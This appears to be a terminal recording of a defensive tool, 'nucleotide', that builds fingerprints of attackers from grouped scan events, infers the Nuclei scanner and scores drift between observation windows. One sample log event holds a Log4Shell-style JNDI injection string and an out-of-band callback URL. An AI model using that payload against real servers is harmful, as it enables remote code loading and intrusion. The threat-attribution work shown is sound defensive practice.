{"version": 2, "width": 90, "height": 30, "timestamp": 1783047921, "env": {"SHELL": "/bin/bash", "TERM": "linux"}, "title": "nucleotide: actor fingerprinting"}
[0.00942, "o", "# 0. Build a lookup so we have templates to match against.\r\n"]
[2.369615, "o", "  (lookup.json built)\r\n"]
[3.371652, "o", "# 1. An operator hands us a batch of events they've already\r\n#    grouped as 'this looks like one actor'. JSONL, one line each.\r\n"]
[4.375958, "o", "\u001b[1;36m$ wc -l events.jsonl && head -1 events.jsonl\u001b[0m\r\n"]
[4.979771, "o", "3 events.jsonl\r\n"]
[4.981409, "o", "{\"ts\":\"2026-07-02T14:00:00Z\",\"src_ip\":\"198.51.100.42\",\"target\":\"victim.example\",\"uri\":\"/?x=${jndi:ldap://x/y}\",\"ua\":\"Nuclei - Open-source project\",\"body\":\"cb=http://a1.oast.online/x\"}\r\n"]
[6.985511, "o", "# 2. Turn the events into an actor fingerprint YAML.\r\n\u001b[1;36m$ nucleotide fingerprint events.jsonl --lookup lookup.json \\\r\n      --actor-id apt-demo --out actor.yml\u001b[0m\r\n"]
[7.660879, "o", "Wrote actor.yml\r\n"]
[9.677763, "o", "# The output captures tool inference, CLI options, template preference.\r\n\u001b[1;36m$ head -18 actor.yml\u001b[0m\r\n"]
[10.281584, "o", "actor_fingerprint:\r\n  id: \"apt-demo\"\r\n  structural_hash: \"sha256:e0ff8ca61371a95fc4f63582342875f2\"\r\n  window:\r\n    - \"2026-07-02T14:00:00Z\"\r\n    - \"2026-07-02T14:00:02Z\"\r\n  events_analyzed: 3\r\n  tool_inference:\r\n    likely_tool: \"nuclei\"\r\n    confidence: 0.8\r\n    signals:\r\n      - \"observed User-Agent matches Nuclei stock default\"\r\n      - \"OAST callbacks resolve to a default interactsh host\"\r\n      - \"traffic matched 3 known Nuclei template(s)\"\r\n    contradictions: []\r\n    non_nuclei_hypothesis:\r\n      description: \"known template YAMLs consumed by a different tool\"\r\n      confidence: 0.2\r\n"]
[12.28605, "o", "# 3. Same events, same fingerprint. Compare is a nop.\r\n\u001b[1;36m$ nucleotide compare actor.yml actor.yml\u001b[0m\r\n"]
[12.959148, "o", "identical: true\r\nreference_hash_a: \"sha256:e0ff8ca61371a95fc4f63582342875f2\"\r\nreference_hash_b: \"sha256:e0ff8ca61371a95fc4f63582342875f2\"\r\ndiverged_fields: {}\r\n"]
[14.973357, "o", "# 4. Fresh events, slightly drifted (added a Fortinet CVE probe).\r\n"]
[15.477323, "o", "\u001b[1;36m$ nucleotide match events.jsonl actor.yml --lookup lookup.json\u001b[0m\r\n"]
[16.150751, "o", "reference_actor: \"apt-demo\"\r\nreference_hash: \"sha256:e0ff8ca61371a95fc4f63582342875f2\"\r\ncandidate_hash: \"sha256:520d029a22e0da55c6401e48f7a641c8\"\r\nmatch_score: 0.95\r\nsignals:\r\n  - \"likely_tool matches\"\r\n  - \"template Jaccard 0.75 (3/4)\"\r\n  - \"-severity matches\"\r\n  - \"-tags differs (ref=['cve', 'kev', 'rce', 'vkev', 'vuln'] cand=['cve', 'kev', 'vkev', 'vuln'])\"\r\n  - \"-random-agent matches\"\r\n  - \"-scan-strategy matches\"\r\n  - \"-interactsh-server matches (oast.online)\"\r\n"]
[18.16563, "o", "# Non-1.0 match_score = drift. Saved fingerprints stay comparable\r\n# across observation windows and different SIEM pipelines.\r\n"]
[19.667761, "o", "# Done. Artifacts in /tmp/tmp.4s80iXqkJw/\r\n"]
